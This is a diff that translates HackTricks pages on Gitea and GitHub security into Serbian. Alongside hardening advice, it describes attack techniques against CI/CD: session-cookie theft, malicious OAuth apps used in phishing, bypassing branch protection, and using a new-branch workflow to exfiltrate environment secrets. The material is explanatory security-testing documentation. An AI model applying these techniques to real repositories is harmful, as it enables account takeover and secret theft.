100644 --- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md @@ -1,107 +1,103 @@ -# Basic Gitea Information +# Osnovne Gitea Informacije {{#include ../../banners/hacktricks-training.md}} -## Basic Structure +## Osnovna Struktura -The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. +Osnovna struktura Gitea okruženja je grupisanje repozitorijuma po **organizacijama**, svaka od njih može sadržati **several repositories** i **several teams**. Međutim, imajte na umu da, kao i na github-u, korisnici mogu imati repozitorijume van organizacije. -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. +Štaviše, **korisnik** može biti **član** **različitih organizacija**. Unutar organizacije korisnik može imati **različite dozvole za svaki repozitorijum**. -A user may also be **part of different teams** with different permissions over different repos. +Korisnik može biti i **deo različitih timova** sa različitim dozvolama za različite repozitorijume. -And finally **repositories may have special protection mechanisms**. +I konačno, **repozitorijumi mogu imati posebne mehanizme zaštite**. -## Permissions +## Dozvole -### Organizations +### Organizacije -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. +Kada se **organizacija kreira**, tim pod nazivom **Vlasnici** se **kreira** i korisnik se stavlja unutra. Ovaj tim će dati **admin pristup** nad **organizacijom**, te **dozvole** i **ime** tima **se ne mogu menjati**. -**Org admins** (owners) can select the **visibility** of the organization: +**Org admini** (vlasnici) mogu odabrati **vidljivost** organizacije: -- Public -- Limited (logged in users only) -- Private (members only) +- Javno +- Ograničeno (samo prijavljeni korisnici) +- Privatno (samo članovi) -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. +**Org admini** takođe mogu naznačiti da li **repo admini** mogu **dodavati ili uklanjati pristup** za timove. Takođe mogu naznačiti maksimalan broj repozitorijuma. -When creating a new team, several important settings are selected: +Kada se kreira novi tim, biraju se nekoliko važnih podešavanja: -- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -- It's also indicated **if members can create new repos** (creator will get admin access to it) -- The **permissions** the **members** of the repo will **have**: - - **Administrator** access - - **Specific** access: +- Naznačuje se **repozitorijumi organizacije kojima će članovi tima moći da pristupaju**: specifični repozitorijumi (repozitorijumi gde je tim dodat) ili svi. +- Takođe se naznačuje **da li članovi mogu kreirati nove repozitorijume** (kreator će dobiti admin pristup). +- **Dozvole** koje će **članovi** repozitorijuma **imati**: +- **Administrator** pristup +- **Specifičan** pristup: ![](<../../images/image (118).png>) -### Teams & Users +### Timovi i Korisnici -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: +U repozitorijumu, **org admin** i **repo admini** (ako to dozvoljava org) mogu **upravljati ulogama** dodeljenim saradnicima (drugim korisnicima) i timovima. Postoje **3** moguće **uloge**: - Administrator -- Write -- Read +- Pisanje +- Čitanje -## Gitea Authentication +## Gitea Autentifikacija -### Web Access +### Web Pristup -Using **username + password** and potentially (and recommended) a 2FA. +Korišćenje **korisničkog imena + lozinke** i potencijalno (i preporučeno) 2FA. -### **SSH Keys** +### **SSH Ključevi** -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) +Možete konfigurisati svoj nalog sa jednim ili više javnih ključeva koji omogućavaju povezani **privatni ključ da izvršava radnje u vaše ime.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) -#### **GPG Keys** +#### **GPG Ključevi** -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. +Ne **možete se pretvarati da ste korisnik sa ovim ključevima**, ali ako ih ne koristite, može biti moguće da **budete otkriveni zbog slanja commit-a bez potpisa**. -### **Personal Access Tokens** +### **Lični Pristupni Tokeni** -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) +Možete generisati lični pristupni token da **dajte aplikaciji pristup vašem nalogu**. Lični pristupni token daje potpun pristup vašem nalogu: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) -### Oauth Applications +### Oauth Aplikacije -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: +Baš kao lični pristupni tokeni, **Oauth aplikacije** će imati **potpun pristup** vašem nalogu i mestima kojima vaš nalog ima pristup, jer, kao što je naznačeno u [dokumentaciji](https://docs.gitea.io/en-us/oauth2-provider/#scopes), opsezi još nisu podržani: ![](<../../images/image (194).png>) -### Deploy keys +### Ključevi za Deploy -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. +Ključevi za deploy mogu imati pristup samo za čitanje ili pisanje repozitorijumu, tako da mogu biti zanimljivi za kompromitovanje specifičnih repozitorijuma. -## Branch Protections +## Zaštite Grana -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. +Zaštite grana su dizajnirane da **ne daju potpunu kontrolu nad repozitorijumom** korisnicima. Cilj je **postaviti nekoliko metoda zaštite pre nego što se može pisati kod unutar neke grane**. -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ +**Zaštite grana repozitorijuma** mogu se naći na _https://localhost:3000/\/\/settings/branches_ > [!NOTE] -> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. +> **Nije moguće postaviti zaštitu grane na nivou organizacije**. Tako da sve one moraju biti deklarisane na svakom repozitorijumu. -Different protections can be applied to a branch (like to master): +Različite zaštite mogu se primeniti na granu (kao na master): -- **Disable Push**: No-one can push to this branch -- **Enable Push**: Anyone with access can push, but not force push. -- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -- **Enable Status checks:** Require status checks to pass before merging. -- **Require approvals**: Indicate the number of approvals required before a PR can be merged. -- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -- **Block merge on official review requests**: If there official review requests it cannot be merged -- **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -- **Require Signed Commits**: Commits must be signed. -- **Block merge if pull request is outdated** -- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes +- **Onemogući Push**: Niko ne može da pošalje na ovu granu +- **Omogući Push**: Svako ko ima pristup može da pošalje, ali ne može da forsira push. +- **Whitelist Ograničen Push**: Samo odabrani korisnici/timovi mogu da pošalju na ovu granu (ali ne može forsirati push) +- **Omogući Merge Whitelist**: Samo korisnici/timovi sa liste mogu da spoje PR-ove. +- **Omogući Status provere:** Zahteva da provere statusa prođu pre spajanja. +- **Zahteva odobrenja**: Naznačite broj odobrenja potrebnih pre nego što se PR može spojiti. +- **Ograniči odobrenja na belu listu**: Naznačite korisnike/timove koji mogu odobriti PR-ove. +- **Blokiraj spajanje na odbijenim recenzijama**: Ako su tražene izmene, ne može se spojiti (čak i ako ostale provere prođu) +- **Blokiraj spajanje na zvanične zahteve za recenziju**: Ako postoje zvanični zahtevi za recenziju, ne može se spojiti +- **Odbaci zastarele odobrenja**: Kada su novi commit-i, stara odobrenja će biti odbijena. +- **Zahteva Potpisane Commit-e**: Commit-i moraju biti potpisani. +- **Blokiraj spajanje ako je pull request zastareo** +- **Zaštićeni/Nezaštićeni obrasci datoteka**: Naznačite obrasce datoteka za zaštitu/nezaštitu od izmena > [!NOTE] -> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +> Kao što možete videti, čak i ako ste uspeli da dobijete neka akreditivna sredstva korisnika, **repozitorijumi mogu biti zaštićeni sprečavajući vas da šaljete kod na master**, na primer, da kompromitujete CI/CD pipeline. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md index cdad12b57..3a2212561 100644 --- a/src/pentesting-ci-cd/github-security/README.md +++ b/src/pentesting-ci-cd/github-security/README.md @@ -2,41 +2,41 @@ {{#include ../../banners/hacktricks-training.md}} -## What is Github +## Šta je Github -(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. +(From [here](https://kinsta.com/knowledgebase/what-is-github/)) Na visokom nivou, **GitHub je veb sajt i usluga zasnovana na oblaku koja pomaže programerima da čuvaju i upravljaju svojim kodom, kao i da prate i kontrolišu promene u svom kodu**. -### Basic Information +### Osnovne informacije {{#ref}} basic-github-information.md {{#endref}} -## External Recon +## Spoljašnje istraživanje -Github repositories can be configured as public, private and internal. +Github repozitorijumi mogu biti konfigurisani kao javni, privatni i interni. -- **Private** means that **only** people of the **organisation** will be able to access them -- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it -- **Public** means that **all internet** is going to be able to access it. +- **Privatni** znači da će **samo** ljudi iz **organizacije** moći da im pristupe +- **Interni** znači da će **samo** ljudi iz **preduzeća** (preduzeće može imati nekoliko organizacija) moći da mu pristupe +- **Javni** znači da će **svi na internetu** moći da mu pristupe. -In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. +U slučaju da znate **korisnika, repozitorijum ili organizaciju koju želite da ciljate**, možete koristiti **github dorks** da pronađete osetljive informacije ili pretražujete **curenja osetljivih informacija** **u svakom repozitorijumu**. ### Github Dorks -Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. +Github omogućava da **pretražujete nešto specificirajući kao opseg korisnika, repozitorijuma ili organizacije**. Stoga, sa listom stringova koji će se pojaviti blizu osetljivih informacija, možete lako **pretraživati potencijalne osetljive informacije u vašem cilju**. -Tools (each tool contains its list of dorks): +Alati (svaki alat sadrži svoju listu dorks): -- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks)) -- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) -- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) +- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Lista Dorks](https://github.com/obheda12/GitDorker/tree/master/Dorks)) +- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Lista Dorks](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) +- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Lista Dorks](https://github.com/hisxo/gitGraber/tree/master/wordlists)) -### Github Leaks +### Github Curenja -Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). +Molimo vas, imajte na umu da su github dorks takođe namenjeni pretraživanju curenja koristeći github opcije pretrage. Ova sekcija je posvećena onim alatima koji će **preuzeti svaki repozitorijum i pretražiti osetljive informacije u njima** (čak proveravajući određenu dubinu commit-a). -Tools (each tool contains its list of regexes): +Alati (svaki alat sadrži svoju listu regex-a): - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) - [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) @@ -47,202 +47,190 @@ Tools (each tool contains its list of regexes): - [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) > [!WARNING] -> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! +> Kada tražite curenja u repozitorijumu i pokrenete nešto poput `git log -p`, ne zaboravite da mogu postojati **druge grane sa drugim commit-ima** koje sadrže tajne! -### External Forks +### Spoljašnji Forkovi -It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork). +Moguće je **kompromitovati repozitorijume zloupotrebom pull zahteva**. Da biste znali da li je repozitorijum ranjiv, uglavnom treba da pročitate Github Actions yaml konfiguracije. [**Više informacija o ovome u nastavku**](./#execution-from-a-external-fork). -### Github Leaks in deleted/internal forks +### Github Curenja u obrisanim/internim forkovima -Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here: +Čak i ako su obrisani ili interni, može biti moguće dobiti osetljive podatke iz forkova github repozitorijuma. Proverite ovde: {{#ref}} accessible-deleted-data-in-github.md {{#endref}} -## Organization Hardening +## Ojačavanje organizacije -### Member Privileges +### Privilegije članova -There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). +Postoje neke **podrazumevane privilegije** koje se mogu dodeliti **članovima** organizacije. Ove se mogu kontrolisati sa stranice `https://github.com/organizations//settings/member_privileges` ili iz [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). -- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. -- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. -- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. -- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** - - _I couldn't find this info in the APIs response, share if you do_ -- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. - - _I couldn't find this info in the APIs response, share if you do_ -- **More things can be configured** in this page but the previous are the ones more security related. +- **Osnovne dozvole**: Članovi će imati dozvolu None/Read/write/Admin za repozitorijume organizacije. Preporučuje se **None** ili **Read**. +- **Forkovanje repozitorijuma**: Ako nije neophodno, bolje je **ne dozvoliti** članovima da fork-uju repozitorijume organizacije. +- **Kreiranje stranica**: Ako nije neophodno, bolje je **ne dozvoliti** članovima da objavljuju stranice iz repozitorijuma organizacije. Ako je neophodno, možete dozvoliti kreiranje javnih ili privatnih stranica. +- **Zahtevi za pristup integraciji**: Sa ovim omogućeno, spoljnim saradnicima će biti omogućeno da zatraže pristup za GitHub ili OAuth aplikacije da pristupe ovoj organizaciji i njenim resursima. Obično je potrebno, ali ako nije, bolje je onemogućiti to. +- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_ +- **Promena vidljivosti repozitorijuma**: Ako je omogućeno, **članovi** sa **admin** dozvolama za **repozitorijum** će moći da **promene njegovu vidljivost**. Ako je onemogućeno, samo vlasnici organizacije mogu menjati vidljivosti repozitorijuma. Ako ne želite da ljudi učine stvari **javnim**, uverite se da je ovo **onemogućeno**. +- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_ +- **Brisanje i prenos repozitorijuma**: Ako je omogućeno, članovi sa **admin** dozvolama za repozitorijum će moći da **obrišu** ili **prenose** javne i privatne **repozitorijume**. +- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_ +- **Dozvoliti članovima da kreiraju timove**: Ako je omogućeno, svaki **član** organizacije će moći da **kreira** nove **timove**. Ako je onemogućeno, samo vlasnici organizacije mogu kreirati nove timove. Bolje je da ovo bude onemogućeno. +- _Nisam mogao pronaći ove informacije u API odgovoru, podelite ako ih pronađete_ +- **Još stvari se mogu konfigurisati** na ovoj stranici, ali prethodne su one koje su više vezane za bezbednost. -### Actions Settings +### Podešavanja akcija -Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`. +Nekoliko podešavanja vezanih za bezbednost može se konfigurisati za akcije sa stranice `https://github.com/organizations//settings/actions`. > [!NOTE] -> Note that all this configurations can also be set on each repository independently +> Imajte na umu da se sve ove konfiguracije takođe mogu postaviti na svakom repozitorijumu nezavisno -- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. - - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) -- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. - - _I couldn't find an API with this info, share if you do_ -- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. - - _I couldn't find an API with this info, share if you do_ -- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows. - - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) +- **Github akcije politike**: Omogućava vam da navedete koji repozitorijumi mogu pokretati radne tokove i koji radni tokovi bi trebali biti dozvoljeni. Preporučuje se da **specificirate koji repozitorijumi** bi trebali biti dozvoljeni i ne dozvoliti svim akcijama da se pokreću. +- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) +- **Fork pull request radni tokovi od spoljnjih saradnika**: Preporučuje se da **zahtevate odobrenje za sve** spoljne saradnike. +- _Nisam mogao pronaći API sa ovim informacijama, podelite ako ih pronađete_ +- **Pokretanje radnih tokova iz fork pull zahteva**: Veoma je **nepreporučljivo pokretati radne tokove iz pull zahteva** jer će održavaoci fork porekla dobiti mogućnost korišćenja tokena sa dozvolama za čitanje na izvorni repozitorijum. +- _Nisam mogao pronaći API sa ovim informacijama, podelite ako ih pronađete_ +- **Dozvole radnog toka**: Veoma se preporučuje da **samo date dozvole za čitanje repozitorijuma**. Ne preporučuje se davanje dozvola za pisanje i kreiranje/odobravanje pull zahteva kako bi se izbegla zloupotreba GITHUB_TOKEN-a datog pokrenutim radnim tokovima. +- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) -### Integrations +### Integracije -_Let me know if you know the API endpoint to access this info!_ +_Javite mi ako znate API krajnju tačku za pristup ovim informacijama!_ -- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). -- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). +- **Politika pristupa aplikacijama trećih strana**: Preporučuje se ograničiti pristup svakoj aplikaciji i dozvoliti samo potrebne (nakon pregleda). +- **Instalirane GitHub aplikacije**: Preporučuje se dozvoliti samo potrebne (nakon pregleda). -## Recon & Attacks abusing credentials +## Istraživanje i napadi zloupotrebom kredencijala -For this scenario we are going to suppose that you have obtained some access to a github account. +Za ovaj scenario pretpostavićemo da ste dobili neki pristup github nalogu. -### With User Credentials +### Sa korisničkim kredencijalima -If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** +Ako nekako već imate kredencijale za korisnika unutar organizacije, možete **samo da se prijavite** i proverite koje **preduzetničke i organizacione uloge imate**, ako ste običan član, proverite koje **dozvole imaju obični članovi**, u kojim **grupama** ste, koje **dozvole imate** nad kojim **repozitorijumima** i **kako su repozitorijumi zaštićeni**. -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +Imajte na umu da se **2FA može koristiti** tako da ćete moći da pristupite ovim informacijama samo ako takođe možete **proći tu proveru**. > [!NOTE] -> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +> Imajte na umu da ako **uspete da ukradete `user_session` kolačić** (trenutno konfigurisano sa SameSite: Lax) možete **potpuno imitirati korisnika** bez potrebe za kredencijalima ili 2FA. -Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. +Proverite odeljak u nastavku o [**zaobilaznicama zaštite grana**](./#branch-protection-bypass) u slučaju da je korisno. -### With User SSH Key +### Sa korisničkim SSH ključem -Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to: +Github omogućava **korisnicima** da postave **SSH ključeve** koji će se koristiti kao **metoda autentifikacije za implementaciju koda** u njihovo ime (2FA se ne primenjuje). +Sa ovim ključem možete izvršiti **promene u repozitorijumima gde korisnik ima neke privilegije**, međutim ne možete ga koristiti za pristup github API-ju da enumerišete okruženje. Međutim, možete **enumerisati lokalne postavke** da dobijete informacije o repozitorijumima i korisniku kojem imate pristup: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +Ako je korisnik konfigurisao svoje korisničko ime kao svoje github korisničko ime, možete pristupiti **javnim ključevima koje je postavio** na svom nalogu na _https://github.com/\.keys_, možete proveriti ovo da potvrdite da li se privatni ključ koji ste pronašli može koristiti. -If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH ključevi** se takođe mogu postaviti u repozitorijume kao **deploy ključevi**. Svako ko ima pristup ovom ključiću moći će da **pokrene projekte iz repozitorijuma**. Obično, na serveru sa različitim deploy ključevima, lokalna datoteka **`~/.ssh/config`** će vam dati informacije o tome kojem ključu se odnosi. -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG Ključevi -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +Kao što je objašnjeno [**ovde**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md), ponekad je potrebno potpisati commit-e ili biste mogli biti otkriveni. +Proverite lokalno da li trenutni korisnik ima neki ključ sa: ```shell gpg --list-secret-keys --keyid-format=long ``` +### Sa korisničkim tokenom -### With User Token +Za uvod o [**korisničkim tokenima proverite osnovne informacije**](basic-github-information.md#personal-access-tokens). -For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). +Korisnički token može biti korišćen **umesto lozinke** za Git preko HTTPS-a, ili može biti korišćen za [**autentifikaciju na API preko osnovne autentifikacije**](https://docs.github.com/v3/auth/#basic-authentication). U zavisnosti od privilegija koje su mu dodeljene, možda ćete moći da izvršite različite radnje. -A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions. +Korisnički token izgleda ovako: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` -A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` +### Sa Oauth aplikacijom -### With Oauth Application +Za uvod o [**Github Oauth aplikacijama proverite osnovne informacije**](basic-github-information.md#oauth-applications). -For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). +Napadač može kreirati **malicious Oauth aplikaciju** da bi pristupio privilegovanim podacima/radnjama korisnika koji je prihvataju verovatno kao deo phishing kampanje. -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +Ovo su [opsegovi koje Oauth aplikacija može zatražiti](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). Uvek treba proveriti tražene opsegove pre nego što ih prihvatite. -These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them. +Pored toga, kao što je objašnjeno u osnovnim informacijama, **organizacije mogu dati/oduzeti pristup trećim aplikacijama** informacijama/repozitorijima/radnjama vezanim za organizaciju. -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +### Sa Github aplikacijom -### With Github Application +Za uvod o [**Github aplikacijama proverite osnovne informacije**](basic-github-information.md#github-applications). -For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). +Napadač može kreirati **malicious Github aplikaciju** da bi pristupio privilegovanim podacima/radnjama korisnika koji je prihvataju verovatno kao deo phishing kampanje. -An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +Pored toga, kao što je objašnjeno u osnovnim informacijama, **organizacije mogu dati/oduzeti pristup trećim aplikacijama** informacijama/repozitorijima/radnjama vezanim za organizaciju. -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +## Kompromitovanje i zloupotreba Github akcije -## Compromise & Abuse Github Action - -There are several techniques to compromise and abuse a Github Action, check them here: +Postoji nekoliko tehnika za kompromitovanje i zloupotrebu Github akcije, proverite ih ovde: {{#ref}} abusing-github-actions/ {{#endref}} -## Branch Protection Bypass +## Obilaženje zaštite grane -- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. -- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** -- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. -- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. -- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). - - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. +- **Zahtevajte određeni broj odobrenja**: Ako ste kompromitovali nekoliko naloga, možete jednostavno prihvatiti svoje PR-ove iz drugih naloga. Ako imate samo nalog sa kojeg ste kreirali PR, ne možete prihvatiti svoj PR. Međutim, ako imate pristup **Github Action** okruženju unutar repozitorijuma, koristeći **GITHUB_TOKEN** možda ćete moći da **odobrite svoj PR** i dobijete 1 odobrenje na ovaj način. +- _Napomena za ovo i za ograničenje vlasnika koda da obično korisnik neće moći da odobri svoje PR-ove, ali ako možete, možete to zloupotrebiti da prihvatite svoje PR-ove._ +- **Odbacite odobrenja kada su novi commit-ovi poslati**: Ako ovo nije postavljeno, možete poslati legitiman kod, čekati da ga neko odobri, a zatim staviti maliciozni kod i spojiti ga u zaštićenu granu. +- **Zahtevajte preglede od vlasnika koda**: Ako je ovo aktivirano i vi ste vlasnik koda, mogli biste napraviti **Github Action da kreira vaš PR i zatim ga odobrite sami**. +- Kada je **CODEOWNER datoteka pogrešno konfigurisana**, Github se ne žali, ali je ne koristi. Stoga, ako je pogrešno konfigurisana, **zaštita vlasnika koda nije primenjena.** +- **Dozvolite određenim akterima da zaobiđu zahteve za povlačenje**: Ako ste jedan od ovih aktera, možete zaobići zaštitu zahteva za povlačenje. +- **Uključite administratore**: Ako ovo nije postavljeno i vi ste administrator repozitorijuma, možete zaobići ovu zaštitu grane. +- **PR otmica**: Možda ćete moći da **modifikujete PR nekog drugog** dodajući maliciozni kod, odobravajući rezultantni PR sami i spajajući sve. +- **Uklanjanje zaštite grane**: Ako ste **administrator repozitorijuma, možete onemogućiti zaštite**, spojiti svoj PR i ponovo postaviti zaštite. +- **Obilaženje zaštita za slanje**: Ako repozitorijum **samo dozvoljava određenim korisnicima** da šalju push (spajaju kod) u granama (zaštita grane može štititi sve grane specificirajući wildcard `*`). +- Ako imate **pristup pisanju u repozitorijumu, ali vam nije dozvoljeno da šaljete kod** zbog zaštite grane, još uvek možete **napraviti novu granu** i unutar nje kreirati **github akciju koja se aktivira kada se kod pošalje**. Kako **zaštita grane neće štititi granu dok ne bude kreirana**, ovo prvo slanje koda u granu će **izvršiti github akciju**. -## Bypass Environments Protections +## Obilaženje zaštita okruženja -For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). +Za uvod o [**Github okruženju proverite osnovne informacije**](basic-github-information.md#git-environments). -In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action 